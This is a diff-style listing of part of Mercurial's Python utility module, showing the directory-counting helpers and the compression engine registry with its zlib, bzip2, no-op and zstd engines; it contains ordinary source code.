3177 for base in finddirs(path):
3182 for base in finddirs(path):
3178 if base in dirs:
3183 if base in dirs:
3179 dirs[base] += 1
3184 dirs[base] += 1
3180 return
3185 return
3181 dirs[base] = 1
3186 dirs[base] = 1
3182
3187
3183 def delpath(self, path):
3188 def delpath(self, path):
3184 dirs = self._dirs
3189 dirs = self._dirs
3185 for base in finddirs(path):
3190 for base in finddirs(path):
3186 if dirs[base] > 1:
3191 if dirs[base] > 1:
3187 dirs[base] -= 1
3192 dirs[base] -= 1
3188 return
3193 return
3189 del dirs[base]
3194 del dirs[base]
3190
3195
3191 def __iter__(self):
3196 def __iter__(self):
3192 return iter(self._dirs)
3197 return iter(self._dirs)
3193
3198
3194 def __contains__(self, d):
3199 def __contains__(self, d):
3195 return d in self._dirs
3200 return d in self._dirs
3196
3201
3197 if safehasattr(parsers, 'dirs'):
3202 if safehasattr(parsers, 'dirs'):
3198 dirs = parsers.dirs
3203 dirs = parsers.dirs
3199
3204
3200 def finddirs(path):
3205 def finddirs(path):
3201 pos = path.rfind('/')
3206 pos = path.rfind('/')
3202 while pos != -1:
3207 while pos != -1:
3203 yield path[:pos]
3208 yield path[:pos]
3204 pos = path.rfind('/', 0, pos)
3209 pos = path.rfind('/', 0, pos)
3205
3210
3206 # compression code
3211 # compression code
3207
3212
3208 SERVERROLE = 'server'
3213 SERVERROLE = 'server'
3209 CLIENTROLE = 'client'
3214 CLIENTROLE = 'client'
3210
3215
3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3216 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 (u'name', u'serverpriority',
3217 (u'name', u'serverpriority',
3213 u'clientpriority'))
3218 u'clientpriority'))
3214
3219
3215 class compressormanager(object):
3220 class compressormanager(object):
3216 """Holds registrations of various compression engines.
3221 """Holds registrations of various compression engines.
3217
3222
3218 This class essentially abstracts the differences between compression
3223 This class essentially abstracts the differences between compression
3219 engines to allow new compression formats to be added easily, possibly from
3224 engines to allow new compression formats to be added easily, possibly from
3220 extensions.
3225 extensions.
3221
3226
3222 Compressors are registered against the global instance by calling its
3227 Compressors are registered against the global instance by calling its
3223 ``register()`` method.
3228 ``register()`` method.
3224 """
3229 """
3225 def __init__(self):
3230 def __init__(self):
3226 self._engines = {}
3231 self._engines = {}
3227 # Bundle spec human name to engine name.
3232 # Bundle spec human name to engine name.
3228 self._bundlenames = {}
3233 self._bundlenames = {}
3229 # Internal bundle identifier to engine name.
3234 # Internal bundle identifier to engine name.
3230 self._bundletypes = {}
3235 self._bundletypes = {}
3231 # Revlog header to engine name.
3236 # Revlog header to engine name.
3232 self._revlogheaders = {}
3237 self._revlogheaders = {}
3233 # Wire proto identifier to engine name.
3238 # Wire proto identifier to engine name.
3234 self._wiretypes = {}
3239 self._wiretypes = {}
3235
3240
3236 def __getitem__(self, key):
3241 def __getitem__(self, key):
3237 return self._engines[key]
3242 return self._engines[key]
3238
3243
3239 def __contains__(self, key):
3244 def __contains__(self, key):
3240 return key in self._engines
3245 return key in self._engines
3241
3246
3242 def __iter__(self):
3247 def __iter__(self):
3243 return iter(self._engines.keys())
3248 return iter(self._engines.keys())
3244
3249
3245 def register(self, engine):
3250 def register(self, engine):
3246 """Register a compression engine with the manager.
3251 """Register a compression engine with the manager.
3247
3252
3248 The argument must be a ``compressionengine`` instance.
3253 The argument must be a ``compressionengine`` instance.
3249 """
3254 """
3250 if not isinstance(engine, compressionengine):
3255 if not isinstance(engine, compressionengine):
3251 raise ValueError(_('argument must be a compressionengine'))
3256 raise ValueError(_('argument must be a compressionengine'))
3252
3257
3253 name = engine.name()
3258 name = engine.name()
3254
3259
3255 if name in self._engines:
3260 if name in self._engines:
3256 raise error.Abort(_('compression engine %s already registered') %
3261 raise error.Abort(_('compression engine %s already registered') %
3257 name)
3262 name)
3258
3263
3259 bundleinfo = engine.bundletype()
3264 bundleinfo = engine.bundletype()
3260 if bundleinfo:
3265 if bundleinfo:
3261 bundlename, bundletype = bundleinfo
3266 bundlename, bundletype = bundleinfo
3262
3267
3263 if bundlename in self._bundlenames:
3268 if bundlename in self._bundlenames:
3264 raise error.Abort(_('bundle name %s already registered') %
3269 raise error.Abort(_('bundle name %s already registered') %
3265 bundlename)
3270 bundlename)
3266 if bundletype in self._bundletypes:
3271 if bundletype in self._bundletypes:
3267 raise error.Abort(_('bundle type %s already registered by %s') %
3272 raise error.Abort(_('bundle type %s already registered by %s') %
3268 (bundletype, self._bundletypes[bundletype]))
3273 (bundletype, self._bundletypes[bundletype]))
3269
3274
3270 # No external facing name declared.
3275 # No external facing name declared.
3271 if bundlename:
3276 if bundlename:
3272 self._bundlenames[bundlename] = name
3277 self._bundlenames[bundlename] = name
3273
3278
3274 self._bundletypes[bundletype] = name
3279 self._bundletypes[bundletype] = name
3275
3280
3276 wiresupport = engine.wireprotosupport()
3281 wiresupport = engine.wireprotosupport()
3277 if wiresupport:
3282 if wiresupport:
3278 wiretype = wiresupport.name
3283 wiretype = wiresupport.name
3279 if wiretype in self._wiretypes:
3284 if wiretype in self._wiretypes:
3280 raise error.Abort(_('wire protocol compression %s already '
3285 raise error.Abort(_('wire protocol compression %s already '
3281 'registered by %s') %
3286 'registered by %s') %
3282 (wiretype, self._wiretypes[wiretype]))
3287 (wiretype, self._wiretypes[wiretype]))
3283
3288
3284 self._wiretypes[wiretype] = name
3289 self._wiretypes[wiretype] = name
3285
3290
3286 revlogheader = engine.revlogheader()
3291 revlogheader = engine.revlogheader()
3287 if revlogheader and revlogheader in self._revlogheaders:
3292 if revlogheader and revlogheader in self._revlogheaders:
3288 raise error.Abort(_('revlog header %s already registered by %s') %
3293 raise error.Abort(_('revlog header %s already registered by %s') %
3289 (revlogheader, self._revlogheaders[revlogheader]))
3294 (revlogheader, self._revlogheaders[revlogheader]))
3290
3295
3291 if revlogheader:
3296 if revlogheader:
3292 self._revlogheaders[revlogheader] = name
3297 self._revlogheaders[revlogheader] = name
3293
3298
3294 self._engines[name] = engine
3299 self._engines[name] = engine
3295
3300
3296 @property
3301 @property
3297 def supportedbundlenames(self):
3302 def supportedbundlenames(self):
3298 return set(self._bundlenames.keys())
3303 return set(self._bundlenames.keys())
3299
3304
3300 @property
3305 @property
3301 def supportedbundletypes(self):
3306 def supportedbundletypes(self):
3302 return set(self._bundletypes.keys())
3307 return set(self._bundletypes.keys())
3303
3308
3304 def forbundlename(self, bundlename):
3309 def forbundlename(self, bundlename):
3305 """Obtain a compression engine registered to a bundle name.
3310 """Obtain a compression engine registered to a bundle name.
3306
3311
3307 Will raise KeyError if the bundle type isn't registered.
3312 Will raise KeyError if the bundle type isn't registered.
3308
3313
3309 Will abort if the engine is known but not available.
3314 Will abort if the engine is known but not available.
3310 """
3315 """
3311 engine = self._engines[self._bundlenames[bundlename]]
3316 engine = self._engines[self._bundlenames[bundlename]]
3312 if not engine.available():
3317 if not engine.available():
3313 raise error.Abort(_('compression engine %s could not be loaded') %
3318 raise error.Abort(_('compression engine %s could not be loaded') %
3314 engine.name())
3319 engine.name())
3315 return engine
3320 return engine
3316
3321
3317 def forbundletype(self, bundletype):
3322 def forbundletype(self, bundletype):
3318 """Obtain a compression engine registered to a bundle type.
3323 """Obtain a compression engine registered to a bundle type.
3319
3324
3320 Will raise KeyError if the bundle type isn't registered.
3325 Will raise KeyError if the bundle type isn't registered.
3321
3326
3322 Will abort if the engine is known but not available.
3327 Will abort if the engine is known but not available.
3323 """
3328 """
3324 engine = self._engines[self._bundletypes[bundletype]]
3329 engine = self._engines[self._bundletypes[bundletype]]
3325 if not engine.available():
3330 if not engine.available():
3326 raise error.Abort(_('compression engine %s could not be loaded') %
3331 raise error.Abort(_('compression engine %s could not be loaded') %
3327 engine.name())
3332 engine.name())
3328 return engine
3333 return engine
3329
3334
3330 def supportedwireengines(self, role, onlyavailable=True):
3335 def supportedwireengines(self, role, onlyavailable=True):
3331 """Obtain compression engines that support the wire protocol.
3336 """Obtain compression engines that support the wire protocol.
3332
3337
3333 Returns a list of engines in prioritized order, most desired first.
3338 Returns a list of engines in prioritized order, most desired first.
3334
3339
3335 If ``onlyavailable`` is set, filter out engines that can't be
3340 If ``onlyavailable`` is set, filter out engines that can't be
3336 loaded.
3341 loaded.
3337 """
3342 """
3338 assert role in (SERVERROLE, CLIENTROLE)
3343 assert role in (SERVERROLE, CLIENTROLE)
3339
3344
3340 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3345 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3341
3346
3342 engines = [self._engines[e] for e in self._wiretypes.values()]
3347 engines = [self._engines[e] for e in self._wiretypes.values()]
3343 if onlyavailable:
3348 if onlyavailable:
3344 engines = [e for e in engines if e.available()]
3349 engines = [e for e in engines if e.available()]
3345
3350
3346 def getkey(e):
3351 def getkey(e):
3347 # Sort first by priority, highest first. In case of tie, sort
3352 # Sort first by priority, highest first. In case of tie, sort
3348 # alphabetically. This is arbitrary, but ensures output is
3353 # alphabetically. This is arbitrary, but ensures output is
3349 # stable.
3354 # stable.
3350 w = e.wireprotosupport()
3355 w = e.wireprotosupport()
3351 return -1 * getattr(w, attr), w.name
3356 return -1 * getattr(w, attr), w.name
3352
3357
3353 return list(sorted(engines, key=getkey))
3358 return list(sorted(engines, key=getkey))
3354
3359
3355 def forwiretype(self, wiretype):
3360 def forwiretype(self, wiretype):
3356 engine = self._engines[self._wiretypes[wiretype]]
3361 engine = self._engines[self._wiretypes[wiretype]]
3357 if not engine.available():
3362 if not engine.available():
3358 raise error.Abort(_('compression engine %s could not be loaded') %
3363 raise error.Abort(_('compression engine %s could not be loaded') %
3359 engine.name())
3364 engine.name())
3360 return engine
3365 return engine
3361
3366
3362 def forrevlogheader(self, header):
3367 def forrevlogheader(self, header):
3363 """Obtain a compression engine registered to a revlog header.
3368 """Obtain a compression engine registered to a revlog header.
3364
3369
3365 Will raise KeyError if the revlog header value isn't registered.
3370 Will raise KeyError if the revlog header value isn't registered.
3366 """
3371 """
3367 return self._engines[self._revlogheaders[header]]
3372 return self._engines[self._revlogheaders[header]]
3368
3373
3369 compengines = compressormanager()
3374 compengines = compressormanager()
3370
3375
3371 class compressionengine(object):
3376 class compressionengine(object):
3372 """Base class for compression engines.
3377 """Base class for compression engines.
3373
3378
3374 Compression engines must implement the interface defined by this class.
3379 Compression engines must implement the interface defined by this class.
3375 """
3380 """
3376 def name(self):
3381 def name(self):
3377 """Returns the name of the compression engine.
3382 """Returns the name of the compression engine.
3378
3383
3379 This is the key the engine is registered under.
3384 This is the key the engine is registered under.
3380
3385
3381 This method must be implemented.
3386 This method must be implemented.
3382 """
3387 """
3383 raise NotImplementedError()
3388 raise NotImplementedError()
3384
3389
3385 def available(self):
3390 def available(self):
3386 """Whether the compression engine is available.
3391 """Whether the compression engine is available.
3387
3392
3388 The intent of this method is to allow optional compression engines
3393 The intent of this method is to allow optional compression engines
3389 that may not be available in all installations (such as engines relying
3394 that may not be available in all installations (such as engines relying
3390 on C extensions that may not be present).
3395 on C extensions that may not be present).
3391 """
3396 """
3392 return True
3397 return True
3393
3398
3394 def bundletype(self):
3399 def bundletype(self):
3395 """Describes bundle identifiers for this engine.
3400 """Describes bundle identifiers for this engine.
3396
3401
3397 If this compression engine isn't supported for bundles, returns None.
3402 If this compression engine isn't supported for bundles, returns None.
3398
3403
3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3404 If this engine can be used for bundles, returns a 2-tuple of strings of
3400 the user-facing "bundle spec" compression name and an internal
3405 the user-facing "bundle spec" compression name and an internal
3401 identifier used to denote the compression format within bundles. To
3406 identifier used to denote the compression format within bundles. To
3402 exclude the name from external usage, set the first element to ``None``.
3407 exclude the name from external usage, set the first element to ``None``.
3403
3408
3404 If bundle compression is supported, the class must also implement
3409 If bundle compression is supported, the class must also implement
3405 ``compressstream`` and `decompressorreader``.
3410 ``compressstream`` and `decompressorreader``.
3406
3411
3407 The docstring of this method is used in the help system to tell users
3412 The docstring of this method is used in the help system to tell users
3408 about this engine.
3413 about this engine.
3409 """
3414 """
3410 return None
3415 return None
3411
3416
3412 def wireprotosupport(self):
3417 def wireprotosupport(self):
3413 """Declare support for this compression format on the wire protocol.
3418 """Declare support for this compression format on the wire protocol.
3414
3419
3415 If this compression engine isn't supported for compressing wire
3420 If this compression engine isn't supported for compressing wire
3416 protocol payloads, returns None.
3421 protocol payloads, returns None.
3417
3422
3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3423 Otherwise, returns ``compenginewireprotosupport`` with the following
3419 fields:
3424 fields:
3420
3425
3421 * String format identifier
3426 * String format identifier
3422 * Integer priority for the server
3427 * Integer priority for the server
3423 * Integer priority for the client
3428 * Integer priority for the client
3424
3429
3425 The integer priorities are used to order the advertisement of format
3430 The integer priorities are used to order the advertisement of format
3426 support by server and client. The highest integer is advertised
3431 support by server and client. The highest integer is advertised
3427 first. Integers with non-positive values aren't advertised.
3432 first. Integers with non-positive values aren't advertised.
3428
3433
3429 The priority values are somewhat arbitrary and only used for default
3434 The priority values are somewhat arbitrary and only used for default
3430 ordering. The relative order can be changed via config options.
3435 ordering. The relative order can be changed via config options.
3431
3436
3432 If wire protocol compression is supported, the class must also implement
3437 If wire protocol compression is supported, the class must also implement
3433 ``compressstream`` and ``decompressorreader``.
3438 ``compressstream`` and ``decompressorreader``.
3434 """
3439 """
3435 return None
3440 return None
3436
3441
3437 def revlogheader(self):
3442 def revlogheader(self):
3438 """Header added to revlog chunks that identifies this engine.
3443 """Header added to revlog chunks that identifies this engine.
3439
3444
3440 If this engine can be used to compress revlogs, this method should
3445 If this engine can be used to compress revlogs, this method should
3441 return the bytes used to identify chunks compressed with this engine.
3446 return the bytes used to identify chunks compressed with this engine.
3442 Else, the method should return ``None`` to indicate it does not
3447 Else, the method should return ``None`` to indicate it does not
3443 participate in revlog compression.
3448 participate in revlog compression.
3444 """
3449 """
3445 return None
3450 return None
3446
3451
3447 def compressstream(self, it, opts=None):
3452 def compressstream(self, it, opts=None):
3448 """Compress an iterator of chunks.
3453 """Compress an iterator of chunks.
3449
3454
3450 The method receives an iterator (ideally a generator) of chunks of
3455 The method receives an iterator (ideally a generator) of chunks of
3451 bytes to be compressed. It returns an iterator (ideally a generator)
3456 bytes to be compressed. It returns an iterator (ideally a generator)
3452 of bytes of chunks representing the compressed output.
3457 of bytes of chunks representing the compressed output.
3453
3458
3454 Optionally accepts an argument defining how to perform compression.
3459 Optionally accepts an argument defining how to perform compression.
3455 Each engine treats this argument differently.
3460 Each engine treats this argument differently.
3456 """
3461 """
3457 raise NotImplementedError()
3462 raise NotImplementedError()
3458
3463
3459 def decompressorreader(self, fh):
3464 def decompressorreader(self, fh):
3460 """Perform decompression on a file object.
3465 """Perform decompression on a file object.
3461
3466
3462 Argument is an object with a ``read(size)`` method that returns
3467 Argument is an object with a ``read(size)`` method that returns
3463 compressed data. Return value is an object with a ``read(size)`` that
3468 compressed data. Return value is an object with a ``read(size)`` that
3464 returns uncompressed data.
3469 returns uncompressed data.
3465 """
3470 """
3466 raise NotImplementedError()
3471 raise NotImplementedError()
3467
3472
3468 def revlogcompressor(self, opts=None):
3473 def revlogcompressor(self, opts=None):
3469 """Obtain an object that can be used to compress revlog entries.
3474 """Obtain an object that can be used to compress revlog entries.
3470
3475
3471 The object has a ``compress(data)`` method that compresses binary
3476 The object has a ``compress(data)`` method that compresses binary
3472 data. This method returns compressed binary data or ``None`` if
3477 data. This method returns compressed binary data or ``None`` if
3473 the data could not be compressed (too small, not compressible, etc).
3478 the data could not be compressed (too small, not compressible, etc).
3474 The returned data should have a header uniquely identifying this
3479 The returned data should have a header uniquely identifying this
3475 compression format so decompression can be routed to this engine.
3480 compression format so decompression can be routed to this engine.
3476 This header should be identified by the ``revlogheader()`` return
3481 This header should be identified by the ``revlogheader()`` return
3477 value.
3482 value.
3478
3483
3479 The object has a ``decompress(data)`` method that decompresses
3484 The object has a ``decompress(data)`` method that decompresses
3480 data. The method will only be called if ``data`` begins with
3485 data. The method will only be called if ``data`` begins with
3481 ``revlogheader()``. The method should return the raw, uncompressed
3486 ``revlogheader()``. The method should return the raw, uncompressed
3482 data or raise a ``RevlogError``.
3487 data or raise a ``RevlogError``.
3483
3488
3484 The object is reusable but is not thread safe.
3489 The object is reusable but is not thread safe.
3485 """
3490 """
3486 raise NotImplementedError()
3491 raise NotImplementedError()
3487
3492
3488 class _zlibengine(compressionengine):
3493 class _zlibengine(compressionengine):
3489 def name(self):
3494 def name(self):
3490 return 'zlib'
3495 return 'zlib'
3491
3496
3492 def bundletype(self):
3497 def bundletype(self):
3493 """zlib compression using the DEFLATE algorithm.
3498 """zlib compression using the DEFLATE algorithm.
3494
3499
3495 All Mercurial clients should support this format. The compression
3500 All Mercurial clients should support this format. The compression
3496 algorithm strikes a reasonable balance between compression ratio
3501 algorithm strikes a reasonable balance between compression ratio
3497 and size.
3502 and size.
3498 """
3503 """
3499 return 'gzip', 'GZ'
3504 return 'gzip', 'GZ'
3500
3505
3501 def wireprotosupport(self):
3506 def wireprotosupport(self):
3502 return compewireprotosupport('zlib', 20, 20)
3507 return compewireprotosupport('zlib', 20, 20)
3503
3508
3504 def revlogheader(self):
3509 def revlogheader(self):
3505 return 'x'
3510 return 'x'
3506
3511
3507 def compressstream(self, it, opts=None):
3512 def compressstream(self, it, opts=None):
3508 opts = opts or {}
3513 opts = opts or {}
3509
3514
3510 z = zlib.compressobj(opts.get('level', -1))
3515 z = zlib.compressobj(opts.get('level', -1))
3511 for chunk in it:
3516 for chunk in it:
3512 data = z.compress(chunk)
3517 data = z.compress(chunk)
3513 # Not all calls to compress emit data. It is cheaper to inspect
3518 # Not all calls to compress emit data. It is cheaper to inspect
3514 # here than to feed empty chunks through generator.
3519 # here than to feed empty chunks through generator.
3515 if data:
3520 if data:
3516 yield data
3521 yield data
3517
3522
3518 yield z.flush()
3523 yield z.flush()
3519
3524
3520 def decompressorreader(self, fh):
3525 def decompressorreader(self, fh):
3521 def gen():
3526 def gen():
3522 d = zlib.decompressobj()
3527 d = zlib.decompressobj()
3523 for chunk in filechunkiter(fh):
3528 for chunk in filechunkiter(fh):
3524 while chunk:
3529 while chunk:
3525 # Limit output size to limit memory.
3530 # Limit output size to limit memory.
3526 yield d.decompress(chunk, 2 ** 18)
3531 yield d.decompress(chunk, 2 ** 18)
3527 chunk = d.unconsumed_tail
3532 chunk = d.unconsumed_tail
3528
3533
3529 return chunkbuffer(gen())
3534 return chunkbuffer(gen())
3530
3535
3531 class zlibrevlogcompressor(object):
3536 class zlibrevlogcompressor(object):
3532 def compress(self, data):
3537 def compress(self, data):
3533 insize = len(data)
3538 insize = len(data)
3534 # Caller handles empty input case.
3539 # Caller handles empty input case.
3535 assert insize > 0
3540 assert insize > 0
3536
3541
3537 if insize < 44:
3542 if insize < 44:
3538 return None
3543 return None
3539
3544
3540 elif insize <= 1000000:
3545 elif insize <= 1000000:
3541 compressed = zlib.compress(data)
3546 compressed = zlib.compress(data)
3542 if len(compressed) < insize:
3547 if len(compressed) < insize:
3543 return compressed
3548 return compressed
3544 return None
3549 return None
3545
3550
3546 # zlib makes an internal copy of the input buffer, doubling
3551 # zlib makes an internal copy of the input buffer, doubling
3547 # memory usage for large inputs. So do streaming compression
3552 # memory usage for large inputs. So do streaming compression
3548 # on large inputs.
3553 # on large inputs.
3549 else:
3554 else:
3550 z = zlib.compressobj()
3555 z = zlib.compressobj()
3551 parts = []
3556 parts = []
3552 pos = 0
3557 pos = 0
3553 while pos < insize:
3558 while pos < insize:
3554 pos2 = pos + 2**20
3559 pos2 = pos + 2**20
3555 parts.append(z.compress(data[pos:pos2]))
3560 parts.append(z.compress(data[pos:pos2]))
3556 pos = pos2
3561 pos = pos2
3557 parts.append(z.flush())
3562 parts.append(z.flush())
3558
3563
3559 if sum(map(len, parts)) < insize:
3564 if sum(map(len, parts)) < insize:
3560 return ''.join(parts)
3565 return ''.join(parts)
3561 return None
3566 return None
3562
3567
3563 def decompress(self, data):
3568 def decompress(self, data):
3564 try:
3569 try:
3565 return zlib.decompress(data)
3570 return zlib.decompress(data)
3566 except zlib.error as e:
3571 except zlib.error as e:
3567 raise error.RevlogError(_('revlog decompress error: %s') %
3572 raise error.RevlogError(_('revlog decompress error: %s') %
3568 str(e))
3573 str(e))
3569
3574
3570 def revlogcompressor(self, opts=None):
3575 def revlogcompressor(self, opts=None):
3571 return self.zlibrevlogcompressor()
3576 return self.zlibrevlogcompressor()
3572
3577
3573 compengines.register(_zlibengine())
3578 compengines.register(_zlibengine())
3574
3579
3575 class _bz2engine(compressionengine):
3580 class _bz2engine(compressionengine):
3576 def name(self):
3581 def name(self):
3577 return 'bz2'
3582 return 'bz2'
3578
3583
3579 def bundletype(self):
3584 def bundletype(self):
3580 """An algorithm that produces smaller bundles than ``gzip``.
3585 """An algorithm that produces smaller bundles than ``gzip``.
3581
3586
3582 All Mercurial clients should support this format.
3587 All Mercurial clients should support this format.
3583
3588
3584 This engine will likely produce smaller bundles than ``gzip`` but
3589 This engine will likely produce smaller bundles than ``gzip`` but
3585 will be significantly slower, both during compression and
3590 will be significantly slower, both during compression and
3586 decompression.
3591 decompression.
3587
3592
3588 If available, the ``zstd`` engine can yield similar or better
3593 If available, the ``zstd`` engine can yield similar or better
3589 compression at much higher speeds.
3594 compression at much higher speeds.
3590 """
3595 """
3591 return 'bzip2', 'BZ'
3596 return 'bzip2', 'BZ'
3592
3597
3593 # We declare a protocol name but don't advertise by default because
3598 # We declare a protocol name but don't advertise by default because
3594 # it is slow.
3599 # it is slow.
3595 def wireprotosupport(self):
3600 def wireprotosupport(self):
3596 return compewireprotosupport('bzip2', 0, 0)
3601 return compewireprotosupport('bzip2', 0, 0)
3597
3602
3598 def compressstream(self, it, opts=None):
3603 def compressstream(self, it, opts=None):
3599 opts = opts or {}
3604 opts = opts or {}
3600 z = bz2.BZ2Compressor(opts.get('level', 9))
3605 z = bz2.BZ2Compressor(opts.get('level', 9))
3601 for chunk in it:
3606 for chunk in it:
3602 data = z.compress(chunk)
3607 data = z.compress(chunk)
3603 if data:
3608 if data:
3604 yield data
3609 yield data
3605
3610
3606 yield z.flush()
3611 yield z.flush()
3607
3612
3608 def decompressorreader(self, fh):
3613 def decompressorreader(self, fh):
3609 def gen():
3614 def gen():
3610 d = bz2.BZ2Decompressor()
3615 d = bz2.BZ2Decompressor()
3611 for chunk in filechunkiter(fh):
3616 for chunk in filechunkiter(fh):
3612 yield d.decompress(chunk)
3617 yield d.decompress(chunk)
3613
3618
3614 return chunkbuffer(gen())
3619 return chunkbuffer(gen())
3615
3620
3616 compengines.register(_bz2engine())
3621 compengines.register(_bz2engine())
3617
3622
3618 class _truncatedbz2engine(compressionengine):
3623 class _truncatedbz2engine(compressionengine):
3619 def name(self):
3624 def name(self):
3620 return 'bz2truncated'
3625 return 'bz2truncated'
3621
3626
3622 def bundletype(self):
3627 def bundletype(self):
3623 return None, '_truncatedBZ'
3628 return None, '_truncatedBZ'
3624
3629
3625 # We don't implement compressstream because it is hackily handled elsewhere.
3630 # We don't implement compressstream because it is hackily handled elsewhere.
3626
3631
3627 def decompressorreader(self, fh):
3632 def decompressorreader(self, fh):
3628 def gen():
3633 def gen():
3629 # The input stream doesn't have the 'BZ' header. So add it back.
3634 # The input stream doesn't have the 'BZ' header. So add it back.
3630 d = bz2.BZ2Decompressor()
3635 d = bz2.BZ2Decompressor()
3631 d.decompress('BZ')
3636 d.decompress('BZ')
3632 for chunk in filechunkiter(fh):
3637 for chunk in filechunkiter(fh):
3633 yield d.decompress(chunk)
3638 yield d.decompress(chunk)
3634
3639
3635 return chunkbuffer(gen())
3640 return chunkbuffer(gen())
3636
3641
3637 compengines.register(_truncatedbz2engine())
3642 compengines.register(_truncatedbz2engine())
3638
3643
3639 class _noopengine(compressionengine):
3644 class _noopengine(compressionengine):
3640 def name(self):
3645 def name(self):
3641 return 'none'
3646 return 'none'
3642
3647
3643 def bundletype(self):
3648 def bundletype(self):
3644 """No compression is performed.
3649 """No compression is performed.
3645
3650
3646 Use this compression engine to explicitly disable compression.
3651 Use this compression engine to explicitly disable compression.
3647 """
3652 """
3648 return 'none', 'UN'
3653 return 'none', 'UN'
3649
3654
3650 # Clients always support uncompressed payloads. Servers don't because
3655 # Clients always support uncompressed payloads. Servers don't because
3651 # unless you are on a fast network, uncompressed payloads can easily
3656 # unless you are on a fast network, uncompressed payloads can easily
3652 # saturate your network pipe.
3657 # saturate your network pipe.
3653 def wireprotosupport(self):
3658 def wireprotosupport(self):
3654 return compewireprotosupport('none', 0, 10)
3659 return compewireprotosupport('none', 0, 10)
3655
3660
3656 # We don't implement revlogheader because it is handled specially
3661 # We don't implement revlogheader because it is handled specially
3657 # in the revlog class.
3662 # in the revlog class.
3658
3663
3659 def compressstream(self, it, opts=None):
3664 def compressstream(self, it, opts=None):
3660 return it
3665 return it
3661
3666
3662 def decompressorreader(self, fh):
3667 def decompressorreader(self, fh):
3663 return fh
3668 return fh
3664
3669
3665 class nooprevlogcompressor(object):
3670 class nooprevlogcompressor(object):
3666 def compress(self, data):
3671 def compress(self, data):
3667 return None
3672 return None
3668
3673
3669 def revlogcompressor(self, opts=None):
3674 def revlogcompressor(self, opts=None):
3670 return self.nooprevlogcompressor()
3675 return self.nooprevlogcompressor()
3671
3676
3672 compengines.register(_noopengine())
3677 compengines.register(_noopengine())
3673
3678
3674 class _zstdengine(compressionengine):
3679 class _zstdengine(compressionengine):
3675 def name(self):
3680 def name(self):
3676 return 'zstd'
3681 return 'zstd'
3677
3682
3678 @propertycache
3683 @propertycache
3679 def _module(self):
3684 def _module(self):
3680 # Not all installs have the zstd module available. So defer importing
3685 # Not all installs have the zstd module available. So defer importing
3681 # until first access.
3686 # until first access.
3682 try:
3687 try:
3683 from . import zstd
3688 from . import zstd
3684 # Force delayed import.
3689 # Force delayed import.
3685 zstd.__version__
3690 zstd.__version__
3686 return zstd
3691 return zstd
3687 except ImportError:
3692 except ImportError:
3688 return None
3693 return None
3689
3694
3690 def available(self):
3695 def available(self):
3691 return bool(self._module)
3696 return bool(self._module)
3692
3697
3693 def bundletype(self):
3698 def bundletype(self):
3694 """A modern compression algorithm that is fast and highly flexible.
3699 """A modern compression algorithm that is fast and highly flexible.
3695
3700
3696 Only supported by Mercurial 4.1 and newer clients.
3701 Only supported by Mercurial 4.1 and newer clients.
3697
3702
3698 With the default settings, zstd compression is both faster and yields
3703 With the default settings, zstd compression is both faster and yields
3699 better compression than ``gzip``. It also frequently yields better
3704 better compression than ``gzip``. It also frequently yields better
3700 compression than ``bzip2`` while operating at much higher speeds.
3705 compression than ``bzip2`` while operating at much higher speeds.
3701
3706
3702 If this engine is available and backwards compatibility is not a
3707 If this engine is available and backwards compatibility is not a
3703 concern, it is likely the best available engine.
3708 concern, it is likely the best available engine.
3704 """
3709 """
3705 return 'zstd', 'ZS'
3710 return 'zstd', 'ZS'
3706
3711
3707 def wireprotosupport(self):
3712 def wireprotosupport(self):
3708 return compewireprotosupport('zstd', 50, 50)
3713 return compewireprotosupport('zstd', 50, 50)
3709
3714
3710 def revlogheader(self):
3715 def revlogheader(self):
3711 return '\x28'
3716 return '\x28'
3712
3717
3713 def compressstream(self, it, opts=None):
3718 def compressstream(self, it, opts=None):
3714 opts = opts or {}
3719 opts = opts or {}
3715 # zstd level 3 is almost always significantly faster than zlib
3720 # zstd level 3 is almost always significantly faster than zlib
3716 # while providing no worse compression. It strikes a good balance
3721 # while providing no worse compression. It strikes a good balance
3717 # between speed and compression.
3722 # between speed and compression.
3718 level = opts.get('level', 3)
3723 level = opts.get('level', 3)
3719
3724
3720 zstd = self._module
3725 zstd = self._module
3721 z = zstd.ZstdCompressor(level=level).compressobj()
3726 z = zstd.ZstdCompressor(level=level).compressobj()
3722 for chunk in it:
3727 for chunk in it:
3723 data = z.compress(chunk)
3728 data = z.compress(chunk)
3724 if data:
3729 if data:
3725 yield data
3730 yield data
3726
3731
3727 yield z.flush()
3732 yield z.flush()
3728
3733
3729 def decompressorreader(self, fh):
3734 def decompressorreader(self, fh):
3730 zstd = self._module
3735 zstd = self._module
3731 dctx = zstd.ZstdDecompressor()
3736 dctx = zstd.ZstdDecompressor()
3732 return chunkbuffer(dctx.read_from(fh))
3737 return chunkbuffer(dctx.read_from(fh))
3733
3738
3734 class zstdrevlogcompressor(object):
3739 class zstdrevlogcompressor(object):
3735 def __init__(self, zstd, level=3):
3740 def __init__(self, zstd, level=3):
3736 # Writing the content size adds a few bytes to the output. However,
3741 # Writing the content size adds a few bytes to the output. However,
3737 # it allows decompression to be more optimal since we can
3742 # it allows decompression to be more optimal since we can
3738 # pre-allocate a buffer to hold the result.
3743 # pre-allocate a buffer to hold the result.
3739 self._cctx = zstd.ZstdCompressor(level=level,
3744 self._cctx = zstd.ZstdCompressor(level=level,
3740 write_content_size=True)
3745 write_content_size=True)
3741 self._dctx = zstd.ZstdDecompressor()
3746 self._dctx = zstd.ZstdDecompressor()
3742 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3747 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3743 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3748 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3744
3749
3745 def compress(self, data):
3750 def compress(self, data):
3746 insize = len(data)
3751 insize = len(data)
3747 # Caller handles empty input case.
3752 # Caller handles empty input case.
3748 assert insize > 0
3753 assert insize > 0
3749
3754
3750 if insize < 50:
3755 if insize < 50:
3751 return None
3756 return None
3752
3757
3753 elif insize <= 1000000:
3758 elif insize <= 1000000:
3754 compressed = self._cctx.compress(data)
3759 compressed = self._cctx.compress(data)
